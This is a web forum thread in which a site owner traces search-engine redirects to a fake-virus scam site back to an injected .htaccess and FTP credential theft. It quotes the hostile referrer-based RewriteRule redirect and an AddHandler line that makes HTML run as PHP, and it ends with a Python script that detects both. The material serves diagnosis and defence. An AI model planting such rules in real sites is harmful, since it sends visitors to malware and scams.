Forum Moderators: phranque
It's been hacked in that if you follow any links to it from Google or Yahoo search results you end up on another site that tells you that you've got a virus and prompts you to install some software to sort the problem (probably very bad malicious software!) - a standard sort of scam it seems these days (*sigh*). Actually, you don't always get to the same page - sometimes it might be a gambling site or similar.
However, my site itself does not seem to be hacked! If you navigate directly to my site it's OK. I've downloaded some of the files and they are untouched.
If you follow a link from webfetch.com it's OK! Other links to the site appear OK.
So basically ALL links to my site from two of the biggest search engines go to some malware site! GREAT!
I'm pretty sure there is nothing virus/malware related on my machine... A friend first noticed this issue when they searched Google on their machine (AVG actually blocked the webpage). I then tried this on my machine and yes - same problem.
I've tried Firefox and IE6 - both the same. My HOSTS file appears OK.
My site is about 10 years old and I've not touched it in years. No 3rd party scripts - mostly just (a lot of) static HTML and JavaScript.
So, what's happened to my links from Google and Yahoo?! Have the search engines themselves been hacked?!
Has anyone seen this sort of thing before? Has anyone any idea what's going on? I'm puzzled and a tad freaked out! Thankfully it's not a commercial site!
Any thoughts most welcome.
A couple of weeks ago, this appeared in my .htaccess file in the root of my site:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.live.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo.com.*$ [NC]
RewriteRule .* [BAD_MALWARE_SITE_HERE.com...] [R,L]
So, that explains why I'm getting redirected following links from the main search engines! Eeesh!
And also (a week ago) my index.html and links.html files (both in the webroot) have acquired an enormous number of invisible links to unsavoury websites! Hhhmmm, I can't see any other files that have changed?!
How could this have happened - bearing in mind I have no 3rd party scripts and very, very little server-side script at all. It's pretty much all static HTML and JavaScript.
May be time to change my webhost?!
One thing they don't cover is the use of popular blog widgets to gain access to generic wordpress based sites (as well as others).
When you run a widget on your site that gathers data from an outside source you need to make sure your site does not have php enabled outside the loop.
Some blog software offers a plugin to allow php code execution sitewide and it's possible for malicious code to be loaded onto your site via the widget.
I realise now that actually, my entire .htaccess was replaced, it wasn't simply appended to. And there was an additional line at the top of the file:
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
:
I have since had a reply from my webhost:
Thank you for your e-mail dated 28th of March 2009. It shows that your FTP login details have been compromised and used to amend the content of your website.
In the first instance, we would recommend changing the FTP Password via the Passwords menu of **** Control Panel.
You should then re-upload any pages which you believe have been modified. We would also strongly recommend performing a virus scan on any computers that may have stored the FTP password, including a scan for spyware / malware and RootKits that may have infected these machines and been used to obtain this and other sensitive information.
:
Hhhhmmm, this sounds like one of those standard replies to me!? I'm pretty sure (well, as sure as I can be) that my FTP details haven't been compromised from my end! And now, all of a sudden, when I log into my control panel I get the message:
We are aware that some of our customers on our **** platform may be experiencing some FTP connectivity issues. We have performed security updates on the platform that have resulted in some FTP passwords no longer being synchronised to the server.
To resolve this please follow the steps below:
- Login to ****
- Click the passwords link on the left hand side of the page.
- Change the system password to a new unique password for added security. This will then re-synchronise your ftp password to your control panel password.
:
Ahhh... an admission of guilt? This sounds like their end to me?!
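The two injected directives described in this thread (the search-referrer RewriteCond/RewriteRule redirect and the AddHandler line that makes .html pages execute as PHP) are easy to miss by eye in a long .htaccess. Below is an added example, not code from the thread or the webhost, of a small audit script that flags both patterns; the sample .htaccess is constructed to mirror the quoted rules and the redirect target is a placeholder hostname.

```python
import re
from typing import List, Tuple

# Constructed sample modelled on the rules quoted in the thread;
# the redirect target is a placeholder, not a real hostname.
SAMPLE_HTACCESS = """\
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo.com.*$ [NC]
RewriteRule .* http://redirect-target.invalid/ [R,L]
"""

# Referrer substrings the injected conditions in the thread key on
SEARCH_ENGINES = ("google", "yahoo", "msn.com", "live.com", "ask.com",
                  "aol.com", "altavista.com", "excite.com")
STATIC_EXTS = {".html", ".htm", ".shtml", ".shtm"}


def _has_redirect_flag(flag_field: str) -> bool:
    """True if a RewriteRule flag field such as '[R,L]' or '[R=301,L]' redirects."""
    flags = [f.strip().upper() for f in flag_field.strip("[]").split(",")]
    return any(f == "R" or f.startswith("R=") for f in flags)


def audit_htaccess(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, finding) pairs for the two injection patterns."""
    findings: List[Tuple[int, str]] = []
    referer_conds: List[int] = []  # RewriteCond lines waiting for their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), start=1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "addhandler" and len(parts) > 2 and "php" in parts[1].lower():
            hit = [e for e in parts[2:] if e.lower() in STATIC_EXTS]
            if hit:  # static page extensions handed to the PHP handler
                findings.append((lineno, "AddHandler makes static pages execute as PHP: " + " ".join(hit)))
        elif directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() == "%{HTTP_REFERER}" and any(s in parts[2].lower() for s in SEARCH_ENGINES):
                referer_conds.append(lineno)
        elif directive == "rewriterule" and len(parts) >= 3:
            # A RewriteCond only governs the next RewriteRule, so the pending list resets here
            if referer_conds and len(parts) > 3 and _has_redirect_flag(parts[3]):
                findings.append((lineno, f"search-referrer redirect (conds at lines {referer_conds}) to {parts[2]}"))
            referer_conds = []
    return findings


if __name__ == "__main__":
    for line_no, msg in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {line_no}: {msg}")
```

Run it over every .htaccess under the webroot (a hostile file can sit in any subdirectory, and `RewriteOptions inherit` pulls parent rules down) and compare against a known-good copy.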